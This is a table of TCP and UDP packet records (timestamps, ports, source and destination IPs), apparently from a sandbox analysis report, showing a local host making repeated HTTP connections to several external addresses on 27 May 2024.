May 27, 2024 12:21:57.022430897 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:21:57.022453070 CEST	63189	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:57.022504091 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:21:57.022517920 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:21:57.022545099 CEST	63189	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:57.023149967 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:21:57.023189068 CEST	63189	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:57.023380041 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:21:57.023396969 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:21:57.023408890 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:21:57.023421049 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:21:57.023432970 CEST	63189	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:57.023482084 CEST	63189	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:57.023926020 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:21:57.023997068 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:21:57.024008036 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:21:57.024019003 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:21:57.024025917 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:21:57.024034977 CEST	63189	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:57.024101019 CEST	63189	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:57.024815083 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:21:57.024843931 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:21:57.024854898 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:21:57.024856091 CEST	63189	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:57.024888992 CEST	63189	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:57.024924040 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:21:57.024964094 CEST	63189	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:57.030100107 CEST	63189	80	192.168.2.7	203.161.43.227
May 27, 2024 12:21:57.035502911 CEST	80	63189	203.161.43.227	192.168.2.7
May 27, 2024 12:22:02.699347019 CEST	63190	80	192.168.2.7	160.251.148.118
May 27, 2024 12:22:02.704322100 CEST	80	63190	160.251.148.118	192.168.2.7
May 27, 2024 12:22:02.704427004 CEST	63190	80	192.168.2.7	160.251.148.118
May 27, 2024 12:22:02.706582069 CEST	63190	80	192.168.2.7	160.251.148.118
May 27, 2024 12:22:02.711513042 CEST	80	63190	160.251.148.118	192.168.2.7
May 27, 2024 12:22:03.528032064 CEST	80	63190	160.251.148.118	192.168.2.7
May 27, 2024 12:22:03.528132915 CEST	80	63190	160.251.148.118	192.168.2.7
May 27, 2024 12:22:03.528274059 CEST	63190	80	192.168.2.7	160.251.148.118
May 27, 2024 12:22:04.211042881 CEST	63190	80	192.168.2.7	160.251.148.118
May 27, 2024 12:22:05.229490042 CEST	63191	80	192.168.2.7	160.251.148.118
May 27, 2024 12:22:05.234503984 CEST	80	63191	160.251.148.118	192.168.2.7
May 27, 2024 12:22:05.235009909 CEST	63191	80	192.168.2.7	160.251.148.118
May 27, 2024 12:22:05.239393950 CEST	63191	80	192.168.2.7	160.251.148.118
May 27, 2024 12:22:05.244240999 CEST	80	63191	160.251.148.118	192.168.2.7
May 27, 2024 12:22:06.048947096 CEST	80	63191	160.251.148.118	192.168.2.7
May 27, 2024 12:22:06.049079895 CEST	80	63191	160.251.148.118	192.168.2.7
May 27, 2024 12:22:06.050690889 CEST	63191	80	192.168.2.7	160.251.148.118
May 27, 2024 12:22:06.742217064 CEST	63191	80	192.168.2.7	160.251.148.118
May 27, 2024 12:22:07.763144016 CEST	63192	80	192.168.2.7	160.251.148.118
May 27, 2024 12:22:07.774072886 CEST	80	63192	160.251.148.118	192.168.2.7
May 27, 2024 12:22:07.774365902 CEST	63192	80	192.168.2.7	160.251.148.118
May 27, 2024 12:22:07.777441025 CEST	63192	80	192.168.2.7	160.251.148.118
May 27, 2024 12:22:07.783452988 CEST	80	63192	160.251.148.118	192.168.2.7
May 27, 2024 12:22:07.783478022 CEST	80	63192	160.251.148.118	192.168.2.7
May 27, 2024 12:22:08.601552963 CEST	80	63192	160.251.148.118	192.168.2.7
May 27, 2024 12:22:08.601572037 CEST	80	63192	160.251.148.118	192.168.2.7
May 27, 2024 12:22:08.601628065 CEST	63192	80	192.168.2.7	160.251.148.118
May 27, 2024 12:22:09.291367054 CEST	63192	80	192.168.2.7	160.251.148.118
May 27, 2024 12:22:10.309143066 CEST	63193	80	192.168.2.7	160.251.148.118
May 27, 2024 12:22:10.317039013 CEST	80	63193	160.251.148.118	192.168.2.7
May 27, 2024 12:22:10.317111015 CEST	63193	80	192.168.2.7	160.251.148.118
May 27, 2024 12:22:10.319360018 CEST	63193	80	192.168.2.7	160.251.148.118
May 27, 2024 12:22:10.327148914 CEST	80	63193	160.251.148.118	192.168.2.7
May 27, 2024 12:22:11.141786098 CEST	80	63193	160.251.148.118	192.168.2.7
May 27, 2024 12:22:11.141904116 CEST	80	63193	160.251.148.118	192.168.2.7
May 27, 2024 12:22:11.141959906 CEST	63193	80	192.168.2.7	160.251.148.118
May 27, 2024 12:22:11.144890070 CEST	63193	80	192.168.2.7	160.251.148.118
May 27, 2024 12:22:11.149816990 CEST	80	63193	160.251.148.118	192.168.2.7
May 27, 2024 12:22:16.353753090 CEST	63194	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:16.359296083 CEST	80	63194	199.59.243.225	192.168.2.7
May 27, 2024 12:22:16.359369040 CEST	63194	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:16.362613916 CEST	63194	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:16.367551088 CEST	80	63194	199.59.243.225	192.168.2.7
May 27, 2024 12:22:16.816160917 CEST	80	63194	199.59.243.225	192.168.2.7
May 27, 2024 12:22:16.816322088 CEST	80	63194	199.59.243.225	192.168.2.7
May 27, 2024 12:22:16.816339016 CEST	80	63194	199.59.243.225	192.168.2.7
May 27, 2024 12:22:16.816404104 CEST	63194	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:16.816404104 CEST	63194	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:17.869991064 CEST	63194	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:18.887233019 CEST	63195	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:18.962599039 CEST	80	63195	199.59.243.225	192.168.2.7
May 27, 2024 12:22:18.962778091 CEST	63195	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:18.969646931 CEST	63195	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:18.974566936 CEST	80	63195	199.59.243.225	192.168.2.7
May 27, 2024 12:22:19.427274942 CEST	80	63195	199.59.243.225	192.168.2.7
May 27, 2024 12:22:19.427299023 CEST	80	63195	199.59.243.225	192.168.2.7
May 27, 2024 12:22:19.427376986 CEST	80	63195	199.59.243.225	192.168.2.7
May 27, 2024 12:22:19.427525997 CEST	63195	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:19.427525997 CEST	63195	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:20.476833105 CEST	63195	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:21.495013952 CEST	63196	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:21.501863956 CEST	80	63196	199.59.243.225	192.168.2.7
May 27, 2024 12:22:21.502232075 CEST	63196	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:21.504662037 CEST	63196	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:21.512831926 CEST	80	63196	199.59.243.225	192.168.2.7
May 27, 2024 12:22:21.512891054 CEST	80	63196	199.59.243.225	192.168.2.7
May 27, 2024 12:22:21.970846891 CEST	80	63196	199.59.243.225	192.168.2.7
May 27, 2024 12:22:21.970865965 CEST	80	63196	199.59.243.225	192.168.2.7
May 27, 2024 12:22:21.970881939 CEST	80	63196	199.59.243.225	192.168.2.7
May 27, 2024 12:22:21.971118927 CEST	63196	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:23.007875919 CEST	63196	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:24.027365923 CEST	63197	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:24.032438993 CEST	80	63197	199.59.243.225	192.168.2.7
May 27, 2024 12:22:24.034456968 CEST	63197	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:24.036463022 CEST	63197	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:24.041331053 CEST	80	63197	199.59.243.225	192.168.2.7
May 27, 2024 12:22:24.515012026 CEST	80	63197	199.59.243.225	192.168.2.7
May 27, 2024 12:22:24.515049934 CEST	80	63197	199.59.243.225	192.168.2.7
May 27, 2024 12:22:24.515156984 CEST	80	63197	199.59.243.225	192.168.2.7
May 27, 2024 12:22:24.515166044 CEST	63197	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:24.515219927 CEST	63197	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:24.518248081 CEST	63197	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:24.523283958 CEST	80	63197	199.59.243.225	192.168.2.7
May 27, 2024 12:22:39.033458948 CEST	63198	80	192.168.2.7	185.31.240.240
May 27, 2024 12:22:39.038631916 CEST	80	63198	185.31.240.240	192.168.2.7
May 27, 2024 12:22:39.038769960 CEST	63198	80	192.168.2.7	185.31.240.240
May 27, 2024 12:22:39.040992022 CEST	63198	80	192.168.2.7	185.31.240.240
May 27, 2024 12:22:39.045942068 CEST	80	63198	185.31.240.240	192.168.2.7
May 27, 2024 12:22:39.695900917 CEST	80	63198	185.31.240.240	192.168.2.7
May 27, 2024 12:22:39.695919991 CEST	80	63198	185.31.240.240	192.168.2.7
May 27, 2024 12:22:39.695933104 CEST	80	63198	185.31.240.240	192.168.2.7
May 27, 2024 12:22:39.695944071 CEST	80	63198	185.31.240.240	192.168.2.7
May 27, 2024 12:22:39.695977926 CEST	63198	80	192.168.2.7	185.31.240.240
May 27, 2024 12:22:39.696022034 CEST	63198	80	192.168.2.7	185.31.240.240
May 27, 2024 12:22:39.700684071 CEST	80	63198	185.31.240.240	192.168.2.7
May 27, 2024 12:22:39.700711012 CEST	80	63198	185.31.240.240	192.168.2.7
May 27, 2024 12:22:39.700725079 CEST	80	63198	185.31.240.240	192.168.2.7
May 27, 2024 12:22:39.700738907 CEST	80	63198	185.31.240.240	192.168.2.7
May 27, 2024 12:22:39.700754881 CEST	63198	80	192.168.2.7	185.31.240.240
May 27, 2024 12:22:39.700809956 CEST	63198	80	192.168.2.7	185.31.240.240
May 27, 2024 12:22:40.554728031 CEST	63198	80	192.168.2.7	185.31.240.240
May 27, 2024 12:22:41.573662996 CEST	63199	80	192.168.2.7	185.31.240.240
May 27, 2024 12:22:41.578704119 CEST	80	63199	185.31.240.240	192.168.2.7
May 27, 2024 12:22:41.578788996 CEST	63199	80	192.168.2.7	185.31.240.240
May 27, 2024 12:22:41.580988884 CEST	63199	80	192.168.2.7	185.31.240.240
May 27, 2024 12:22:41.585879087 CEST	80	63199	185.31.240.240	192.168.2.7
May 27, 2024 12:22:42.241200924 CEST	80	63199	185.31.240.240	192.168.2.7
May 27, 2024 12:22:42.241220951 CEST	80	63199	185.31.240.240	192.168.2.7
May 27, 2024 12:22:42.241231918 CEST	80	63199	185.31.240.240	192.168.2.7
May 27, 2024 12:22:42.241241932 CEST	80	63199	185.31.240.240	192.168.2.7
May 27, 2024 12:22:42.241252899 CEST	80	63199	185.31.240.240	192.168.2.7
May 27, 2024 12:22:42.241262913 CEST	80	63199	185.31.240.240	192.168.2.7
May 27, 2024 12:22:42.241276026 CEST	80	63199	185.31.240.240	192.168.2.7
May 27, 2024 12:22:42.241281033 CEST	63199	80	192.168.2.7	185.31.240.240
May 27, 2024 12:22:42.241332054 CEST	63199	80	192.168.2.7	185.31.240.240
May 27, 2024 12:22:42.241362095 CEST	80	63199	185.31.240.240	192.168.2.7
May 27, 2024 12:22:42.241401911 CEST	63199	80	192.168.2.7	185.31.240.240
May 27, 2024 12:22:43.086318970 CEST	63199	80	192.168.2.7	185.31.240.240
May 27, 2024 12:22:44.104418993 CEST	63200	80	192.168.2.7	185.31.240.240
May 27, 2024 12:22:44.109482050 CEST	80	63200	185.31.240.240	192.168.2.7
May 27, 2024 12:22:44.109600067 CEST	63200	80	192.168.2.7	185.31.240.240
May 27, 2024 12:22:44.111512899 CEST	63200	80	192.168.2.7	185.31.240.240
May 27, 2024 12:22:44.116426945 CEST	80	63200	185.31.240.240	192.168.2.7
May 27, 2024 12:22:44.116614103 CEST	80	63200	185.31.240.240	192.168.2.7
May 27, 2024 12:22:44.754641056 CEST	80	63200	185.31.240.240	192.168.2.7
May 27, 2024 12:22:44.754662991 CEST	80	63200	185.31.240.240	192.168.2.7
May 27, 2024 12:22:44.754678965 CEST	80	63200	185.31.240.240	192.168.2.7
May 27, 2024 12:22:44.754692078 CEST	80	63200	185.31.240.240	192.168.2.7
May 27, 2024 12:22:44.754704952 CEST	80	63200	185.31.240.240	192.168.2.7
May 27, 2024 12:22:44.754715919 CEST	80	63200	185.31.240.240	192.168.2.7
May 27, 2024 12:22:44.754740953 CEST	80	63200	185.31.240.240	192.168.2.7
May 27, 2024 12:22:44.754756927 CEST	80	63200	185.31.240.240	192.168.2.7
May 27, 2024 12:22:44.754770041 CEST	63200	80	192.168.2.7	185.31.240.240
May 27, 2024 12:22:44.754970074 CEST	63200	80	192.168.2.7	185.31.240.240
May 27, 2024 12:22:45.617209911 CEST	63200	80	192.168.2.7	185.31.240.240
May 27, 2024 12:22:46.639245033 CEST	63201	80	192.168.2.7	185.31.240.240
May 27, 2024 12:22:46.689292908 CEST	80	63201	185.31.240.240	192.168.2.7
May 27, 2024 12:22:46.695375919 CEST	63201	80	192.168.2.7	185.31.240.240
May 27, 2024 12:22:46.698255062 CEST	63201	80	192.168.2.7	185.31.240.240
May 27, 2024 12:22:46.703186035 CEST	80	63201	185.31.240.240	192.168.2.7
May 27, 2024 12:22:47.358438015 CEST	80	63201	185.31.240.240	192.168.2.7
May 27, 2024 12:22:47.358457088 CEST	80	63201	185.31.240.240	192.168.2.7
May 27, 2024 12:22:47.358541012 CEST	80	63201	185.31.240.240	192.168.2.7
May 27, 2024 12:22:47.358570099 CEST	63201	80	192.168.2.7	185.31.240.240
May 27, 2024 12:22:47.358587027 CEST	80	63201	185.31.240.240	192.168.2.7
May 27, 2024 12:22:47.358602047 CEST	80	63201	185.31.240.240	192.168.2.7
May 27, 2024 12:22:47.358620882 CEST	63201	80	192.168.2.7	185.31.240.240
May 27, 2024 12:22:47.358644962 CEST	80	63201	185.31.240.240	192.168.2.7
May 27, 2024 12:22:47.358675003 CEST	63201	80	192.168.2.7	185.31.240.240
May 27, 2024 12:22:47.358683109 CEST	80	63201	185.31.240.240	192.168.2.7
May 27, 2024 12:22:47.358691931 CEST	80	63201	185.31.240.240	192.168.2.7
May 27, 2024 12:22:47.358726025 CEST	63201	80	192.168.2.7	185.31.240.240
May 27, 2024 12:22:47.358864069 CEST	80	63201	185.31.240.240	192.168.2.7
May 27, 2024 12:22:47.358900070 CEST	63201	80	192.168.2.7	185.31.240.240
May 27, 2024 12:22:47.362807989 CEST	63201	80	192.168.2.7	185.31.240.240
May 27, 2024 12:22:47.367727041 CEST	80	63201	185.31.240.240	192.168.2.7
May 27, 2024 12:22:52.483144999 CEST	63202	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:52.488187075 CEST	80	63202	199.59.243.225	192.168.2.7
May 27, 2024 12:22:52.488296032 CEST	63202	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:52.490180969 CEST	63202	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:52.495126009 CEST	80	63202	199.59.243.225	192.168.2.7
May 27, 2024 12:22:52.945401907 CEST	80	63202	199.59.243.225	192.168.2.7
May 27, 2024 12:22:52.945430040 CEST	80	63202	199.59.243.225	192.168.2.7
May 27, 2024 12:22:52.945516109 CEST	63202	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:52.945709944 CEST	80	63202	199.59.243.225	192.168.2.7
May 27, 2024 12:22:52.945763111 CEST	63202	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:53.992172003 CEST	63202	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:55.011084080 CEST	63203	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:55.016110897 CEST	80	63203	199.59.243.225	192.168.2.7
May 27, 2024 12:22:55.016242027 CEST	63203	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:55.019215107 CEST	63203	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:55.024116039 CEST	80	63203	199.59.243.225	192.168.2.7
May 27, 2024 12:22:55.479209900 CEST	80	63203	199.59.243.225	192.168.2.7
May 27, 2024 12:22:55.479232073 CEST	80	63203	199.59.243.225	192.168.2.7
May 27, 2024 12:22:55.479242086 CEST	80	63203	199.59.243.225	192.168.2.7
May 27, 2024 12:22:55.479286909 CEST	63203	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:56.523386955 CEST	63203	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:57.543385983 CEST	63204	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:57.774553061 CEST	80	63204	199.59.243.225	192.168.2.7
May 27, 2024 12:22:57.774621964 CEST	63204	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:57.778562069 CEST	63204	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:57.783601999 CEST	80	63204	199.59.243.225	192.168.2.7
May 27, 2024 12:22:57.783701897 CEST	80	63204	199.59.243.225	192.168.2.7
May 27, 2024 12:22:58.239726067 CEST	80	63204	199.59.243.225	192.168.2.7
May 27, 2024 12:22:58.239746094 CEST	80	63204	199.59.243.225	192.168.2.7
May 27, 2024 12:22:58.239759922 CEST	80	63204	199.59.243.225	192.168.2.7
May 27, 2024 12:22:58.239810944 CEST	63204	80	192.168.2.7	199.59.243.225
May 27, 2024 12:22:59.291217089 CEST	63204	80	192.168.2.7	199.59.243.225
May 27, 2024 12:23:00.308788061 CEST	63205	80	192.168.2.7	199.59.243.225
May 27, 2024 12:23:00.500220060 CEST	80	63205	199.59.243.225	192.168.2.7
May 27, 2024 12:23:00.500627041 CEST	63205	80	192.168.2.7	199.59.243.225
May 27, 2024 12:23:00.502659082 CEST	63205	80	192.168.2.7	199.59.243.225
May 27, 2024 12:23:00.507658005 CEST	80	63205	199.59.243.225	192.168.2.7
May 27, 2024 12:23:00.995928049 CEST	80	63205	199.59.243.225	192.168.2.7
May 27, 2024 12:23:00.995959044 CEST	80	63205	199.59.243.225	192.168.2.7
May 27, 2024 12:23:00.995980978 CEST	80	63205	199.59.243.225	192.168.2.7
May 27, 2024 12:23:00.996104002 CEST	63205	80	192.168.2.7	199.59.243.225
May 27, 2024 12:23:00.996104002 CEST	63205	80	192.168.2.7	199.59.243.225
May 27, 2024 12:23:00.999195099 CEST	63205	80	192.168.2.7	199.59.243.225
May 27, 2024 12:23:01.004131079 CEST	80	63205	199.59.243.225	192.168.2.7
May 27, 2024 12:23:06.043070078 CEST	63206	80	192.168.2.7	3.33.130.190
May 27, 2024 12:23:06.047955036 CEST	80	63206	3.33.130.190	192.168.2.7
May 27, 2024 12:23:06.048022032 CEST	63206	80	192.168.2.7	3.33.130.190
May 27, 2024 12:23:06.049832106 CEST	63206	80	192.168.2.7	3.33.130.190
May 27, 2024 12:23:06.054774046 CEST	80	63206	3.33.130.190	192.168.2.7
May 27, 2024 12:23:06.526554108 CEST	80	63206	3.33.130.190	192.168.2.7
May 27, 2024 12:23:06.530477047 CEST	63206	80	192.168.2.7	3.33.130.190
May 27, 2024 12:23:08.533289909 CEST	63206	80	192.168.2.7	3.33.130.190
May 27, 2024 12:23:08.540128946 CEST	80	63206	3.33.130.190	192.168.2.7
May 27, 2024 12:23:09.543205023 CEST	63207	80	192.168.2.7	3.33.130.190
May 27, 2024 12:23:09.548379898 CEST	80	63207	3.33.130.190	192.168.2.7
May 27, 2024 12:23:09.548463106 CEST	63207	80	192.168.2.7	3.33.130.190
May 27, 2024 12:23:09.550307989 CEST	63207	80	192.168.2.7	3.33.130.190
May 27, 2024 12:23:09.555213928 CEST	80	63207	3.33.130.190	192.168.2.7
May 27, 2024 12:23:10.015681028 CEST	80	63207	3.33.130.190	192.168.2.7
May 27, 2024 12:23:10.015779972 CEST	63207	80	192.168.2.7	3.33.130.190
May 27, 2024 12:23:11.054619074 CEST	63207	80	192.168.2.7	3.33.130.190
May 27, 2024 12:23:11.059654951 CEST	80	63207	3.33.130.190	192.168.2.7
May 27, 2024 12:23:12.074961901 CEST	63208	80	192.168.2.7	3.33.130.190
May 27, 2024 12:23:12.079937935 CEST	80	63208	3.33.130.190	192.168.2.7
May 27, 2024 12:23:12.080018044 CEST	63208	80	192.168.2.7	3.33.130.190
May 27, 2024 12:23:12.082437038 CEST	63208	80	192.168.2.7	3.33.130.190
May 27, 2024 12:23:12.087344885 CEST	80	63208	3.33.130.190	192.168.2.7
May 27, 2024 12:23:12.087488890 CEST	80	63208	3.33.130.190	192.168.2.7
May 27, 2024 12:23:12.540066957 CEST	80	63208	3.33.130.190	192.168.2.7
May 27, 2024 12:23:12.542629004 CEST	63208	80	192.168.2.7	3.33.130.190
May 27, 2024 12:23:13.585941076 CEST	63208	80	192.168.2.7	3.33.130.190
May 27, 2024 12:23:13.592608929 CEST	80	63208	3.33.130.190	192.168.2.7
May 27, 2024 12:23:14.604607105 CEST	63209	80	192.168.2.7	3.33.130.190
May 27, 2024 12:23:14.610436916 CEST	80	63209	3.33.130.190	192.168.2.7
May 27, 2024 12:23:14.610521078 CEST	63209	80	192.168.2.7	3.33.130.190
May 27, 2024 12:23:14.615155935 CEST	63209	80	192.168.2.7	3.33.130.190
May 27, 2024 12:23:14.620085001 CEST	80	63209	3.33.130.190	192.168.2.7
May 27, 2024 12:23:15.085428953 CEST	80	63209	3.33.130.190	192.168.2.7
May 27, 2024 12:23:15.085705996 CEST	80	63209	3.33.130.190	192.168.2.7
May 27, 2024 12:23:15.087239027 CEST	63209	80	192.168.2.7	3.33.130.190
May 27, 2024 12:23:15.091166019 CEST	63209	80	192.168.2.7	3.33.130.190
May 27, 2024 12:23:15.096004009 CEST	80	63209	3.33.130.190	192.168.2.7
May 27, 2024 12:23:20.170393944 CEST	63210	80	192.168.2.7	91.195.240.92
May 27, 2024 12:23:20.175456047 CEST	80	63210	91.195.240.92	192.168.2.7
May 27, 2024 12:23:20.175566912 CEST	63210	80	192.168.2.7	91.195.240.92
May 27, 2024 12:23:20.177505016 CEST	63210	80	192.168.2.7	91.195.240.92
May 27, 2024 12:23:20.182472944 CEST	80	63210	91.195.240.92	192.168.2.7
May 27, 2024 12:23:20.821274996 CEST	80	63210	91.195.240.92	192.168.2.7
May 27, 2024 12:23:20.821315050 CEST	80	63210	91.195.240.92	192.168.2.7
May 27, 2024 12:23:20.821415901 CEST	63210	80	192.168.2.7	91.195.240.92
May 27, 2024 12:23:21.679784060 CEST	63210	80	192.168.2.7	91.195.240.92
May 27, 2024 12:23:22.698503017 CEST	63211	80	192.168.2.7	91.195.240.92
May 27, 2024 12:23:22.709763050 CEST	80	63211	91.195.240.92	192.168.2.7
May 27, 2024 12:23:22.710064888 CEST	63211	80	192.168.2.7	91.195.240.92
May 27, 2024 12:23:22.712028027 CEST	63211	80	192.168.2.7	91.195.240.92
May 27, 2024 12:23:22.716928959 CEST	80	63211	91.195.240.92	192.168.2.7
May 27, 2024 12:23:23.357072115 CEST	80	63211	91.195.240.92	192.168.2.7
May 27, 2024 12:23:23.357206106 CEST	80	63211	91.195.240.92	192.168.2.7
May 27, 2024 12:23:23.363234997 CEST	63211	80	192.168.2.7	91.195.240.92
May 27, 2024 12:23:23.658021927 CEST	80	63211	91.195.240.92	192.168.2.7
May 27, 2024 12:23:23.658077955 CEST	63211	80	192.168.2.7	91.195.240.92
May 27, 2024 12:23:23.660245895 CEST	80	63211	91.195.240.92	192.168.2.7
May 27, 2024 12:23:23.660291910 CEST	63211	80	192.168.2.7	91.195.240.92
May 27, 2024 12:23:24.226922989 CEST	63211	80	192.168.2.7	91.195.240.92
May 27, 2024 12:23:26.725564957 CEST	63212	80	192.168.2.7	91.195.240.92
May 27, 2024 12:23:26.730756998 CEST	80	63212	91.195.240.92	192.168.2.7
May 27, 2024 12:23:26.730887890 CEST	63212	80	192.168.2.7	91.195.240.92
May 27, 2024 12:23:26.732769012 CEST	63212	80	192.168.2.7	91.195.240.92
May 27, 2024 12:23:26.737899065 CEST	80	63212	91.195.240.92	192.168.2.7
May 27, 2024 12:23:26.738089085 CEST	80	63212	91.195.240.92	192.168.2.7
May 27, 2024 12:23:27.369196892 CEST	80	63212	91.195.240.92	192.168.2.7
May 27, 2024 12:23:27.370095968 CEST	80	63212	91.195.240.92	192.168.2.7
May 27, 2024 12:23:27.370280027 CEST	63212	80	192.168.2.7	91.195.240.92
May 27, 2024 12:23:28.242166042 CEST	63212	80	192.168.2.7	91.195.240.92
May 27, 2024 12:23:29.260341883 CEST	63213	80	192.168.2.7	91.195.240.92
May 27, 2024 12:23:29.265410900 CEST	80	63213	91.195.240.92	192.168.2.7
May 27, 2024 12:23:29.265516996 CEST	63213	80	192.168.2.7	91.195.240.92
May 27, 2024 12:23:29.267343044 CEST	63213	80	192.168.2.7	91.195.240.92
May 27, 2024 12:23:29.272258997 CEST	80	63213	91.195.240.92	192.168.2.7
May 27, 2024 12:23:29.914674997 CEST	80	63213	91.195.240.92	192.168.2.7
May 27, 2024 12:23:29.914782047 CEST	80	63213	91.195.240.92	192.168.2.7
May 27, 2024 12:23:29.914848089 CEST	63213	80	192.168.2.7	91.195.240.92
May 27, 2024 12:23:29.917582035 CEST	63213	80	192.168.2.7	91.195.240.92
May 27, 2024 12:23:29.922442913 CEST	80	63213	91.195.240.92	192.168.2.7
May 27, 2024 12:23:34.946526051 CEST	63214	80	192.168.2.7	38.47.207.149
May 27, 2024 12:23:34.951478958 CEST	80	63214	38.47.207.149	192.168.2.7
May 27, 2024 12:23:34.951668978 CEST	63214	80	192.168.2.7	38.47.207.149
May 27, 2024 12:23:34.953430891 CEST	63214	80	192.168.2.7	38.47.207.149
May 27, 2024 12:23:34.958359957 CEST	80	63214	38.47.207.149	192.168.2.7
May 27, 2024 12:23:35.859523058 CEST	80	63214	38.47.207.149	192.168.2.7
May 27, 2024 12:23:35.859548092 CEST	80	63214	38.47.207.149	192.168.2.7
May 27, 2024 12:23:35.859617949 CEST	63214	80	192.168.2.7	38.47.207.149
May 27, 2024 12:23:36.460874081 CEST	63214	80	192.168.2.7	38.47.207.149
May 27, 2024 12:23:37.480360031 CEST	63215	80	192.168.2.7	38.47.207.149
May 27, 2024 12:23:37.485328913 CEST	80	63215	38.47.207.149	192.168.2.7
May 27, 2024 12:23:37.485395908 CEST	63215	80	192.168.2.7	38.47.207.149
May 27, 2024 12:23:37.487536907 CEST	63215	80	192.168.2.7	38.47.207.149
May 27, 2024 12:23:37.492460012 CEST	80	63215	38.47.207.149	192.168.2.7
May 27, 2024 12:23:38.393469095 CEST	80	63215	38.47.207.149	192.168.2.7
May 27, 2024 12:23:38.393604994 CEST	80	63215	38.47.207.149	192.168.2.7
May 27, 2024 12:23:38.393641949 CEST	63215	80	192.168.2.7	38.47.207.149
May 27, 2024 12:23:38.992242098 CEST	63215	80	192.168.2.7	38.47.207.149
May 27, 2024 12:23:40.012388945 CEST	63216	80	192.168.2.7	38.47.207.149
May 27, 2024 12:23:40.017405987 CEST	80	63216	38.47.207.149	192.168.2.7
May 27, 2024 12:23:40.017474890 CEST	63216	80	192.168.2.7	38.47.207.149
May 27, 2024 12:23:40.021313906 CEST	63216	80	192.168.2.7	38.47.207.149
May 27, 2024 12:23:40.026422024 CEST	80	63216	38.47.207.149	192.168.2.7
May 27, 2024 12:23:40.026451111 CEST	80	63216	38.47.207.149	192.168.2.7
May 27, 2024 12:23:40.924274921 CEST	80	63216	38.47.207.149	192.168.2.7
May 27, 2024 12:23:40.924308062 CEST	80	63216	38.47.207.149	192.168.2.7
May 27, 2024 12:23:40.926546097 CEST	63216	80	192.168.2.7	38.47.207.149
May 27, 2024 12:23:41.523354053 CEST	63216	80	192.168.2.7	38.47.207.149
May 27, 2024 12:23:42.944694996 CEST	63217	80	192.168.2.7	38.47.207.149
May 27, 2024 12:23:42.949956894 CEST	80	63217	38.47.207.149	192.168.2.7
May 27, 2024 12:23:42.950102091 CEST	63217	80	192.168.2.7	38.47.207.149
May 27, 2024 12:23:42.952230930 CEST	63217	80	192.168.2.7	38.47.207.149
May 27, 2024 12:23:42.957230091 CEST	80	63217	38.47.207.149	192.168.2.7
May 27, 2024 12:23:43.841264963 CEST	80	63217	38.47.207.149	192.168.2.7
May 27, 2024 12:23:43.841428995 CEST	80	63217	38.47.207.149	192.168.2.7
May 27, 2024 12:23:43.841506004 CEST	63217	80	192.168.2.7	38.47.207.149
May 27, 2024 12:23:44.809151888 CEST	63217	80	192.168.2.7	38.47.207.149
May 27, 2024 12:23:44.814595938 CEST	80	63217	38.47.207.149	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 27, 2024 12:20:00.171402931 CEST	53	56687	1.1.1.1	192.168.2.7
